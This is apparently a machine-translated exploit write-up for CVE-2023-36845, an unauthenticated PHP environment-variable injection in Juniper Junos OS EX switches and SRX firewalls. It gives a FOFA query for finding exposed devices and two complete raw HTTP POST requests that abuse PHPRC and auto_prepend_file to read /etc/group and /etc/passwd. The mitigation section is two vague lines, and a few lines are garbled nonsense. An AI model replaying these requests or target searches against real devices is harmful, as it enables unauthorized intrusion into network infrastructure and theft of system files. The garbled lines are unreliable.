Juniper Networks Junos OS EX remote command execution vulnerability [CVE-2023-36845]
Disclaimer: Please do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article will be the responsibility of the user himself. All consequences incurred Adverse consequences have nothing to do with the author of the article. This article is for educational purposes only.
1: Vulnerability description
Juniper Networks Junos OS EX is a network operating system of the American Juniper Networks company dedicated to the company's hardware equipment. It contains a PHP environment variable manipulation vulnerability affecting Juniper SRX firewalls and EX switches. An attacker can perform remote command execution without authorization.
2: Vulnerability affected versions
所有version < 21.4R3-S5
22.1version < 22.1R3-S4
22.2version < 22.2R3-S2
22.3version < 22.3R2-S2、22.3R3-S1
22.4version < 22.4R2-S1、22.4R3
23.2version < 23.2R1-S1、23.2R2
Three: Cyberspace surveying and mapping query
fofa:title=“Juniper Web Device Manager”
4. Recurrence of vulnerabilities
1. Manual reproduction
Recurring POC1
POST /?PHPRC=/dev/fd/0 HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
auto_prepend_file="/etc/group"
burpsuite screenshot
Reproduced POC2
POST /?PHPRC=/dev/fd/0 HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
Sec-Ch-Ua: "-Not.A/Brand";v="8", "Chromium";v="102"
Sec-Ch-Ua-Mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
auto_prepend_file="/etc/passwd"
burpsuite screenshot
2. Automated recurrence
Xiaolong POC detection tool for a while
Another touching piece of azuki red
7. Repair suggestions
Upgraded version
Block sensitive code execution